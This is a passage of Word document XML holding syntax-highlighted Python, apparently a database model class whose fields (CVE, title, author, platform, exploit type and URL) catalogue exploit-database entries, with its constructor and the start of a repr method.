          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Integer)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    cve = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    title = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    author = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    published_time = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    verified = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    platform = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    exploit_type = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    exploit_url = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    exploit_app = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(String)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>__init__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eid</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cve</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>title</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>author</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>published_time</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verified</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>platform</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit_type</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit_url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit_app</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.eid = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.cve = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.title = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.author = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>author</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.published_time = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>published_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.verified = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.platform = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.exploit_type = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit_type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.exploit_url = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit_url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.exploit_app = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit_app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>__repr__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;id:%s poc_id ('%s')&gt;:%s" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>% (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
